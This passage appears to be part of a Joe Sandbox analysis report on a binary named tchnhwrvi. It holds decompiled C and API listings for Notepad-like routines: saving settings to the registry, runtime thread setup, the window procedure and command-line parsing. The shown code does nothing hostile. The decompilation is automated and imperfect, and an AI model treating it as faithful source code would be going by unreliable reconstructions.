                    • RegSetValueExW.ADVAPI32(?,lfStrikeOut,00000000,00000004,?,00000004), ref: 002814BA
                    • RegSetValueExW.ADVAPI32(?,lfUnderline,00000000,00000004,?,00000004), ref: 002814D9
                    • RegSetValueExW.ADVAPI32(?,lfWeight,00000000,00000004,?,00000004), ref: 002814F7
                    • RegSetValueExW.ADVAPI32(?,iMarginTop,00000000,00000004,?,00000004), ref: 00281515
                    • RegSetValueExW.ADVAPI32(?,iMarginBottom,00000000,00000004,?,00000004), ref: 00281533
                    • RegSetValueExW.ADVAPI32(?,iMarginLeft,00000000,00000004,?,00000004), ref: 00281551
                    • RegSetValueExW.ADVAPI32(?,iMarginRight,00000000,00000004,?,00000004), ref: 0028156F
                    • RegSetValueExW.ADVAPI32(?,bStatusBar,00000000,00000004,?,00000004), ref: 0028158D
                      • Part of subcall function 00281020: RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 0028103A
                      • Part of subcall function 00281020: RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,00281594,?,?,?,00281594), ref: 00281062
                      • Part of subcall function 00281020: RegCloseKey.ADVAPI32(?,?,00281594), ref: 0028107F
                    • MulDiv.KERNEL32(?,000002D0,00000000), ref: 002815A5
                    • RegSetValueExW.ADVAPI32(?,iPointSize,00000000,00000004,?,00000004), ref: 002815C1
                    • lstrlenW.KERNEL32(0029711C), ref: 002815CE
                    • RegSetValueExW.ADVAPI32(?,lfFaceName,00000000,00000001,0029711C,00000000), ref: 002815E5
                    • lstrlenW.KERNEL32(00297E60), ref: 002815EC
                    • RegSetValueExW.ADVAPI32(?,szHeader,00000000,00000001,00297E60,00000000), ref: 00281603
                    • lstrlenW.KERNEL32(00298068), ref: 0028160A
                    • RegSetValueExW.ADVAPI32(?,szTrailer,00000000,00000001,00298068,00000000), ref: 00281621
                    • RegCloseKey.ADVAPI32(?), ref: 00281627
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Value$lstrlen$Close$CreateOpenPlacementQueryWindow
                    • String ID: ,$Software\Microsoft\Notepad$bStatusBar$fWrap$iMarginBottom$iMarginLeft$iMarginRight$iMarginTop$iPointSize$iWindowPosDX$iWindowPosDY$iWindowPosX$iWindowPosY$lfCharSet$lfClipPrecision$lfEscapement$lfFaceName$lfItalic$lfOrientation$lfOutPrecision$lfPitchAndFamily$lfQuality$lfStrikeOut$lfUnderline$lfWeight$szHeader$szTrailer
                    • API String ID: 3965342766-4088090211
                    • Opcode ID: 5c25994bed4de11f2da9cafca366b3f1efb379ee3a690d8ad69aecacce761416
                    • Instruction ID: 7683da5cacc04de4b6a450b4fe93bf3db442fa3ee8cca3673ad3d0b9cb0cef88
                    • Opcode Fuzzy Hash: 5c25994bed4de11f2da9cafca366b3f1efb379ee3a690d8ad69aecacce761416
                    • Instruction Fuzzy Hash: B5C140B5BA431CBFEB14DB94DC86FAD7BB9AB49B00F104156B700B72D0C6B06A54CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00286A51 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 62%
                    			E00286A51(void* __ebx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;

				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x295a5c = GetProcAddress(_t35, "FlsAlloc");
					 *0x295a60 = GetProcAddress(_t35, "FlsGetValue");
					 *0x295a64 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x295a5c;
					_t39 = TlsSetValue;
					 *0x295a68 = _t7;
					if( *0x295a5c == 0) {
						L6:
						 *0x295a60 = TlsGetValue;
						 *0x295a5c = E00286761;
						 *0x295a64 = _t39;
						 *0x295a68 = TlsFree;
					} else {
						__eflags =  *0x295a60;
						if( *0x295a60 == 0) {
							goto L6;
						} else {
							__eflags =  *0x295a64;
							if( *0x295a64 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x294544 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x295a60);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E00285DA0();
							_t41 = __imp__EncodePointer;
							_t14 =  *_t41( *0x295a5c);
							 *0x295a5c = _t14;
							_t15 =  *_t41( *0x295a60);
							 *0x295a60 = _t15;
							_t16 =  *_t41( *0x295a64);
							 *0x295a64 = _t16;
							 *0x295a68 =  *_t41( *0x295a68);
							_t18 = E00286E3A();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E0028679E();
								goto L15;
							} else {
								_t36 = __imp__DecodePointer;
								_t21 =  *((intOrPtr*)( *_t36()))( *0x295a5c, E00286922);
								 *0x294540 = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E00286CCA(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										__eflags =  *((intOrPtr*)( *_t36()))( *0x295a64,  *0x294540, _t42);
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											E002867DB(_t30, _t36, _t42, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E0028679E();
					return 0;
				}
			}





















                    0x00286a51
                    0x00286a5f
                    0x00286a63
                    0x00286a83
                    0x00286a90
                    0x00286a9d
                    0x00286aa2
                    0x00286aa4
                    0x00286aab
                    0x00286ab1
                    0x00286ab6
                    0x00286ace
                    0x00286ad3
                    0x00286add
                    0x00286ae7
                    0x00286aed
                    0x00286ab8
                    0x00286ab8
                    0x00286abf
                    0x00000000
                    0x00286ac1
                    0x00286ac1
                    0x00286ac8
                    0x00000000
                    0x00286aca
                    0x00286aca
                    0x00286acc
                    0x00000000
                    0x00000000
                    0x00286acc
                    0x00286ac8
                    0x00286abf
                    0x00286af2
                    0x00286af8
                    0x00286afd
                    0x00286b00
                    0x00286bc7
                    0x00286bc7
                    0x00286bc7
                    0x00286b06
                    0x00286b0d
                    0x00286b0f
                    0x00286b11
                    0x00000000
                    0x00286b17
                    0x00286b17
                    0x00286b22
                    0x00286b28
                    0x00286b30
                    0x00286b35
                    0x00286b3d
                    0x00286b42
                    0x00286b4a
                    0x00286b51
                    0x00286b56
                    0x00286b5b
                    0x00286b5d
                    0x00286bc2
                    0x00286bc2
                    0x00000000
                    0x00286b5f
                    0x00286b5f
                    0x00286b72
                    0x00286b74
                    0x00286b79
                    0x00286b7c
                    0x00000000
                    0x00286b7e
                    0x00286b8a
                    0x00286b8e
                    0x00286b90
                    0x00000000
                    0x00286b92
                    0x00286ba3
                    0x00286ba5
                    0x00000000
                    0x00286ba7
                    0x00286ba7
                    0x00286ba9
                    0x00286baa
                    0x00286bb1
                    0x00286bb7
                    0x00286bbb
                    0x00286bbf
                    0x00286bbf
                    0x00286ba5
                    0x00286b90
                    0x00286b7c
                    0x00286b5d
                    0x00286b11
                    0x00286bcb
                    0x00286a65
                    0x00286a65
                    0x00286a6d
                    0x00286a6d

                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0028348E), ref: 00286A59
                    • __mtterm.LIBCMT ref: 00286A65
                      • Part of subcall function 0028679E: DecodePointer.KERNEL32(00000006,00286BC7,?,0028348E), ref: 002867AF
                      • Part of subcall function 0028679E: TlsFree.KERNEL32(00000024,00286BC7,?,0028348E), ref: 002867C9
                      • Part of subcall function 0028679E: DeleteCriticalSection.KERNEL32(00000000,00000000,77D5F3A0,?,00286BC7,?,0028348E), ref: 00286EA1
                      • Part of subcall function 0028679E: _free.LIBCMT ref: 00286EA4
                      • Part of subcall function 0028679E: DeleteCriticalSection.KERNEL32(00000024,77D5F3A0,?,00286BC7,?,0028348E), ref: 00286ECB
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00286A7B
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00286A88
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00286A95
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00286AA2
                    • TlsAlloc.KERNEL32(?,0028348E), ref: 00286AF2
                    • TlsSetValue.KERNEL32(00000000,?,0028348E), ref: 00286B0D
                    • __init_pointers.LIBCMT ref: 00286B17
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B28
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B35
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B42
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B4F
                    • DecodePointer.KERNEL32(00286922,?,0028348E), ref: 00286B70
                    • __calloc_crt.LIBCMT ref: 00286B85
                    • DecodePointer.KERNEL32(00000000,?,0028348E), ref: 00286B9F
                    • GetCurrentThreadId.KERNEL32 ref: 00286BB1
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                    • API String ID: 3698121176-3819984048
                    • Opcode ID: e455c2a6503c26fd29fc238e3e3e54fe2b58e08c4b6b0271290496655874ecfb
                    • Instruction ID: 806961e2b0e1b2a503bf1dd311f57dede3cff168ecaa759e9c7d1cdb5a234e0a
                    • Opcode Fuzzy Hash: e455c2a6503c26fd29fc238e3e3e54fe2b58e08c4b6b0271290496655874ecfb
                    • Instruction Fuzzy Hash: 97318035A227259FDB127FB4BC8DA193BE5EB05724B180617E404E36F0D7748961CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00282340 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 247windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 79%
                    			E00282340(struct HWND__* _a4, int _a8, int _a12, unsigned int _a16) {
				short _v524;
				struct tagRECT _v540;
				void* __edi;
				void* __esi;
				int _t35;
				struct HWND__* _t43;
				struct HWND__* _t48;
				void* _t81;
				signed int _t86;
				void* _t122;
				signed int _t136;
				void* _t138;

				_t35 = _a8;
				_t138 = (_t136 & 0xfffffff8) - 0x21c;
				if(_t35 != ( *0x295f64 & 0x0000ffff)) {
					__eflags = _t35 - 0x10;
					if(__eflags > 0) {
						__eflags = _t35 - 0x117;
						if(__eflags > 0) {
							__eflags = _t35 - 0x233;
							if(_t35 == 0x233) {
								_t122 = _a12;
								DragQueryFileW(_t122, 0,  &_v524, 0x41);
								DragFinish(_t122);
								 *0x280000( &_v524, 0xffffffff);
								goto L33;
							} else {
								__eflags = _t35 - 0x307;
								if(_t35 == 0x307) {
									goto L33;
								} else {
									goto L31;
								}
							}
						} else {
							if(__eflags == 0) {
								E00281F50(_a12);
								__eflags = 0;
								return 0;
							} else {
								__eflags = _t35 - 0x11;
								if(_t35 == 0x11) {
									_t43 =  *0x280000();
									__eflags = _t43;
									if(_t43 == 0) {
										goto L33;
									} else {
										return 1;
									}
								} else {
									__eflags = _t35 - 0x111;
									if(_t35 != 0x111) {
										goto L31;
									} else {
										E00281C40(_a12 & 0x0000ffff);
										__eflags = 0;
										return 0;
									}
								}
							}
						}
					} else {
						if(__eflags == 0) {
							_t48 =  *0x280000();
							__eflags = _t48;
							if(_t48 == 0) {
								goto L33;
							} else {
								DestroyWindow(_a4);
								__eflags = 0;
								return 0;
							}
						} else {
							_t86 = _t35 - 1;
							__eflags = _t86 - 6;
							if(_t86 > 6) {
								L31:
								return DefWindowProcW(_a4, _t35, _a12, _a16);
							} else {
								switch( *((intOrPtr*)(_t86 * 4 +  &M002825F4))) {
									case 0:
										_t130 = _a4;
										_t107 = 0x50a00144;
										GetClientRect(_t130,  &_v540);
										__eflags =  *0x29715c;
										if( *0x29715c == 0) {
											_t107 = 0x50b001c4;
										}
										 *0x2970ec = CreateWindowExW(0x200, L"edit", 0, _t107, 0, 0, _v540.right, _v540.bottom, _t130, 0,  *0x2970e0, 0);
										_t55 = CreateFontIndirectW(0x297100);
										 *0x2970f0 = _t55;
										SendMessageW( *0x2970ec, 0x30, _t55, 0);
										SendMessageW( *0x2970ec, 0xc5, 0, 0);
										 *0x2970f4 = CreateWindowExW(0, "jnj", 0, 0x50000000, 0, 0, 0, "jjjjh", _t130, 0,  *0x2970e0, 0);
										_t62 = LoadStringW( *0x2970e0, 0x206, 0x2970fc, 0) | 0xffffffff;
										 *0x298274 = _t62;
										 *0x298278 = _t62;
										E00281090();
										__eflags = 0;
										return 0;
										goto L34;
									case 1:
										__eax = E00281290();
										PostQuitMessage(0);
										__eax = 0;
										__eflags = 0;
										_pop(__edi);
										_pop(__esi);
										return 0;
										goto L34;
									case 2:
										goto L31;
									case 3:
										__eax = _a16;
										_a16 >> 0x10 = E00281230(_a16 >> 0x10, __cx & 0x0000ffff);
										__eax = 0;
										__eflags = 0;
										_pop(__edi);
										_pop(__esi);
										return 0;
										goto L34;
									case 4:
										SetFocus( *0x2970ec) = 0;
										__eflags = 0;
										_pop(__edi);
										_pop(__esi);
										return 0;
										goto L34;
								}
							}
						}
					}
				} else {
					_t81 = _a16;
					if(( *(_t81 + 0xc) & 0x00000040) != 0) {
						 *0x2970e8 = 0;
					}
					if(( *(_t81 + 0xc) & 0x00000008) != 0) {
						memcpy(0x2982a4, _t81, 0xa << 2);
						_t138 = _t138 + 0xc;
						E00281FF0(_t81);
					}
					if(( *(_t81 + 0xc) & 0x00000010) != 0) {
						memcpy(0x2982a4, _t81, 0xa << 2);
						_t138 = _t138 + 0xc;
						E00282130(_t81);
					}
					if(( *(_t81 + 0xc) & 0x00000020) == 0) {
						L33:
						__eflags = 0;
						return 0;
					} else {
						memcpy(0x2982a4, _t81, 0xa << 2);
						E00282200(_t81);
						return 0;
					}
				}
				L34:
			}















                    0x0028234d
                    0x00282350
                    0x0028235b
                    0x002823ce
                    0x002823d1
                    0x00282544
                    0x00282549
                    0x00282598
                    0x0028259d
                    0x002825c2
                    0x002825cf
                    0x002825d6
                    0x002825e3
                    0x00000000
                    0x0028259f
                    0x0028259f
                    0x002825a4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x002825a4
                    0x0028254b
                    0x0028254b
                    0x00282588
                    0x0028258d
                    0x00282595
                    0x0028254d
                    0x0028254d
                    0x00282550
                    0x0028256d
                    0x00282573
                    0x00282575
                    0x00000000
                    0x00282577
                    0x00282582
                    0x00282582
                    0x00282552
                    0x00282552
                    0x00282557
                    0x00000000
                    0x00282559
                    0x0028255d
                    0x00282562
                    0x0028256a
                    0x0028256a
                    0x00282557
                    0x00282550
                    0x0028254b
                    0x002823d7
                    0x002823d7
                    0x00282521
                    0x00282527
                    0x00282529
                    0x00000000
                    0x0028252f
                    0x00282533
                    0x00282539
                    0x00282541
                    0x00282541
                    0x002823dd
                    0x002823dd
                    0x002823e0
                    0x002823e3
                    0x002825a6
                    0x002825bf
                    0x002823e9
                    0x002823e9
                    0x00000000
                    0x002823f0
                    0x002823f9
                    0x002823fe
                    0x00282404
                    0x0028240b
                    0x0028240d
                    0x0028240d
                    0x00282445
                    0x0028244a
                    0x00282459
                    0x00282466
                    0x00282478
                    0x002824a2
                    0x002824b8
                    0x002824bb
                    0x002824c0
                    0x002824c5
                    0x002824ca
                    0x002824d2
                    0x00000000
                    0x00000000
                    0x002824d5
                    0x002824dc
                    0x002824e2
                    0x002824e2
                    0x002824e4
                    0x002824e5
                    0x002824ea
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x002824f0
                    0x002824f9
                    0x002824fe
                    0x002824fe
                    0x00282500
                    0x00282501
                    0x00282506
                    0x00000000
                    0x00000000
                    0x00282516
                    0x00282516
                    0x00282518
                    0x00282519
                    0x0028251e
                    0x00000000
                    0x00000000
                    0x002823e9
                    0x002823e3
                    0x002823d7
                    0x0028235d
                    0x0028235d
                    0x00282364
                    0x00282366
                    0x00282366
                    0x00282374
                    0x00282383
                    0x00282383
                    0x00282385
                    0x00282385
                    0x0028238e
                    0x0028239c
                    0x0028239c
                    0x002823a0
                    0x002823a0
                    0x002823a9
                    0x002825e9
                    0x002825eb
                    0x002825f1
                    0x002823af
                    0x002823bc
                    0x002823be
                    0x002823cb
                    0x002823cb
                    0x002823a9
                    0x00000000

                    APIs
                    • GetClientRect.USER32 ref: 002823FE
                    • CreateWindowExW.USER32 ref: 0028243E
                    • CreateFontIndirectW.GDI32(00297100), ref: 0028244A
                    • SendMessageW.USER32(?,00000030,00000000,00000000), ref: 00282466
                    • SendMessageW.USER32(?,000000C5,00000000,00000000), ref: 00282478
                    • CreateWindowExW.USER32 ref: 00282499
                    • LoadStringW.USER32(?,00000206,002970FC,00000000), ref: 002824B2
                      • Part of subcall function 00281290: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Notepad,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 002812B5
                      • Part of subcall function 00281290: GetWindowPlacement.USER32(?,?), ref: 002812D6
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,fWrap,00000000,00000004,?,00000004), ref: 00281321
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosX,00000000,00000004,?,00000004), ref: 0028133F
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosY,00000000,00000004,?,00000004), ref: 0028135D
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosDX,00000000,00000004,?,00000004), ref: 00281381
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosDY,00000000,00000004,?,00000004), ref: 002813A5
                    • PostQuitMessage.USER32(00000000), ref: 002824DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Value$Create$MessageWindow$Send$ClientFontIndirectLoadPlacementPostQuitRectString
                    • String ID: VQRj$edit$jjjjh$jnj
                    • API String ID: 3987337835-3548645043
                    • Opcode ID: a1e9a088b440044b75dc435b629bdbd80fe915961714fb563a195529e405ab9e
                    • Instruction ID: 2b53c4a1264e6350e1134cc7a8918ad7f2b26b5cc1d221b23885593c0b876936
                    • Opcode Fuzzy Hash: a1e9a088b440044b75dc435b629bdbd80fe915961714fb563a195529e405ab9e
                    • Instruction Fuzzy Hash: 3C715B363652089BE714EFA9FC8DF6A7398EB84321F10452BFE08DB1D0D67598248760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281E60 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 75stringwindowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 76%
                    			E00281E60() {
				WCHAR* _t42;
				WCHAR* _t43;
				WCHAR* _t44;

				LoadStringW( *0x2970e0, 0x176, 0x297984, 0xff);
				_t42 = 0x297986 + lstrlenW(0x297984) * 2;
				lstrcpyW(_t42, L"*.txt");
				_t43 = _t42 + 2 + lstrlenW(_t42) * 2;
				LoadStringW( *0x2970e0, 0x175, _t43, 0xff);
				_t44 = _t43 + 2 + lstrlenW(_t43) * 2;
				lstrcpyW(_t44, L"*.*");
				 *((short*)(_t44 + 2 + lstrlenW(_t44) * 2)) = 0;
				 *0x2982cc = 0;
				 *0x2982d0 = 0;
				asm("sbb eax, eax");
				CheckMenuItem(GetMenu( *0x2970e4), 0x119,  ~( *0x29715c) & 0x00000008);
				asm("sbb edx, edx");
				CheckMenuItem(GetMenu( *0x2970e4), 0x205,  ~( *0x2970f8) & 0x00000008);
				asm("sbb ecx, ecx");
				return ShowWindow( *0x2970f4,  ~( *0x2970f8) & 0x00000005);
			}






                    0x00281e7e
                    0x00281e8d
                    0x00281e9a
                    0x00281eae
                    0x00281eb9
                    0x00281ebe
                    0x00281ec8
                    0x00281ed9
                    0x00281ee6
                    0x00281eeb
                    0x00281ef7
                    0x00281f0c
                    0x00281f1b
                    0x00281f2a
                    0x00281f3a
                    0x00281f4a

                    APIs
                    • LoadStringW.USER32(?,00000176,00297984,000000FF), ref: 00281E7E
                    • lstrlenW.KERNEL32(00297984,?,?,?,?,?,?,?), ref: 00281E8B
                    • lstrcpyW.KERNEL32 ref: 00281E9A
                    • lstrlenW.KERNEL32(80000000,?,?,?,?,?,?,?), ref: 00281EA1
                    • LoadStringW.USER32(?,00000175,?,000000FF), ref: 00281EB9
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00281EBC
                    • lstrcpyW.KERNEL32 ref: 00281EC8
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00281ECF
                    • GetMenu.USER32(?), ref: 00281F03
                    • CheckMenuItem.USER32(00000000), ref: 00281F0C
                    • GetMenu.USER32(?), ref: 00281F27
                    • CheckMenuItem.USER32(00000000), ref: 00281F2A
                    • ShowWindow.USER32(?,?,?,?,?,?,?,?,?), ref: 00281F41
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Menulstrlen$CheckItemLoadStringlstrcpy$ShowWindow
                    • String ID: *.*$*.txt
                    • API String ID: 3918228958-3257935098
                    • Opcode ID: 36f3749ec2c145ffb1ec381189e2efe330a46752e03151568a15bc1db7b000df
                    • Instruction ID: 9ee78d2d1968606edcfef0ee4bae9b0d193893bdaa9c418f8ab1c688c1add7d7
                    • Opcode Fuzzy Hash: 36f3749ec2c145ffb1ec381189e2efe330a46752e03151568a15bc1db7b000df
                    • Instruction Fuzzy Hash: 9A218E72674215BFD6089B79FC8EEBA3779EFC9B00701811BF609E31A0DA74A4118B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00282690 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 177COMMON
                    Download Yara Rule
                    C-Code - Quality: 55%
                    			E00282690(WCHAR* __eax) {
				short _v524;
				signed int _t14;
				signed int _t15;
				WCHAR* _t16;
				signed int _t17;
				int _t20;
				void* _t29;
				void* _t33;
				WCHAR* _t36;
				short _t37;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				intOrPtr* _t55;
				WCHAR* _t59;

				_t59 = __eax;
				_t37 = 0;
				if( *((short*)(__eax)) == 0x20) {
					do {
						_t59 =  &(_t59[1]);
					} while ( *_t59 == 0x20);
				}
				_t14 =  *_t59 & 0x0000ffff;
				_t41 = (0 | _t14 == 0x00000022) + (0 | _t14 == 0x00000022) + 0x00000020 & 0x0000ffff;
				if(_t14 == _t41) {
					_t59 =  &(_t59[1]);
				}
				_t15 =  *_t59 & 0x0000ffff;
				if(_t15 == 0) {
					L7:
					if( *_t59 == _t41) {
						goto L8;
					}
				} else {
					while(_t15 != _t41) {
						_t15 = _t59[1] & 0x0000ffff;
						_t59 =  &(_t59[1]);
						if(_t15 != 0) {
							continue;
						} else {
							goto L7;
						}
						goto L9;
					}
					L8:
					_t59 =  &(_t59[1]);
				}
				L9:
				while( *_t59 == 0x20) {
					_t59 =  &(_t59[1]);
				}
				_t16 = _t59;
				while(1) {
					_t42 =  *_t16 & 0x0000ffff;
					if(_t42 != 0x20 && _t42 != 0x2d && _t42 != 0x2f) {
						break;
					}
					_t16 =  &(_t16[1]);
					if(_t42 != 0x20) {
						_t43 =  *_t16 & 0x0000ffff;
						if(_t43 != 0) {
							_t16 =  &(_t16[1]);
						}
						while( *_t16 == 0x20) {
							_t16 =  &(_t16[1]);
						}
						if(_t43 == 0x50 || _t43 == 0x70) {
							if(_t37 == 0) {
								_t37 = 1;
								_t59 = _t16;
							}
						}
					}
					L45:
				}
				_t17 =  *_t59 & 0x0000ffff;
				if(_t17 == 0) {
					return _t17;
				} else {
					if(_t17 == 0x22) {
						_t59 =  &(_t59[1]);
						_t36 = _t59;
						if( *_t59 != 0) {
							while( *_t36 != 0x22) {
								_t36 =  &(_t36[1]);
								if( *_t36 != 0) {
									continue;
								}
								goto L32;
							}
						}
						L32:
						 *_t36 = 0;
					}
					_t55 =  *0x280000; // 0x905a4d
					_push(_t59);
					if( *_t55() != 0) {
						L35:
						 *0x280000(_t59, 0xffffffff);
						_t20 = InvalidateRect( *0x2970e4, 0, 0);
						if(_t37 == 0) {
							goto L43;
						}
						return  *0x280000();
					} else {
						lstrcpynW( &_v524, _t59, 0x103 - lstrlenW(L".txt"));
						lstrcatW( &_v524, L".txt");
						_t59 =  &_v524;
						_push(_t59);
						if( *_t55() == 0) {
							_t29 = E00282610( &_v524) - 2;
							if(_t29 == 0) {
								_t20 = DestroyWindow( *0x2970e4);
								L43:
								return _t20;
							}
							_t20 = _t29 - 4;
							if(_t20 != 0) {
								goto L43;
							}
							lstrcpyW(0x297570,  &_v524);
							 *0x297778 = 0;
							GetFileTitleW( &_v524, 0x297778, 0x32);
							 *0x297980 = 0;
							_t33 = CreateFileW( &_v524, 0x40000000, 2, 0, 4, 0x80, 0);
							if(_t33 != 0xffffffff) {
								CloseHandle(_t33);
							}
							return  *0x280000();
						} else {
							goto L35;
						}
					}
				}
				goto L45;
			}


















                    0x0028269b
                    0x0028269d
                    0x002826a3
                    0x002826a5
                    0x002826a5
                    0x002826a8
                    0x002826a5
                    0x002826ae
                    0x002826bd
                    0x002826c3
                    0x002826c5
                    0x002826c5
                    0x002826c8
                    0x002826ce
                    0x002826e1
                    0x002826e4
                    0x00000000
                    0x00000000
                    0x002826d0
                    0x002826d0
                    0x002826d5
                    0x002826d9
                    0x002826df
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x002826df
                    0x002826e6
                    0x002826e6
                    0x002826e6
                    0x002826e9
                    0x002826ed
                    0x002826f0
                    0x002826f3
                    0x002826f9
                    0x00282700
                    0x00282700
                    0x00282706
                    0x00000000
                    0x00000000
                    0x00282712
                    0x00282718
                    0x0028271a
                    0x00282720
                    0x00282722
                    0x00282722
                    0x00282729
                    0x00282730
                    0x00282733
                    0x0028273c
                    0x00282745
                    0x00282747
                    0x0028274c
                    0x0028274c
                    0x00282745
                    0x0028273c
                    0x00000000
                    0x00282718
                    0x00282750
                    0x00282756
                    0x0028289d
                    0x0028275c
                    0x0028275f
                    0x00282761
                    0x00282768
                    0x0028276a
                    0x00282770
                    0x00282776
                    0x0028277d
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0028277d
                    0x00282770
                    0x0028277f
                    0x00282781
                    0x00282781
                    0x00282785
                    0x0028278b
                    0x00282790
                    0x002827d4
                    0x002827d7
                    0x002827e8
                    0x002827f0
                    0x00000000
                    0x00000000
                    0x00282802
                    0x00282792
                    0x002827ad
                    0x002827bf
                    0x002827c5
                    0x002827cd
                    0x002827d2
                    0x0028280f
                    0x00282812
                    0x00282891
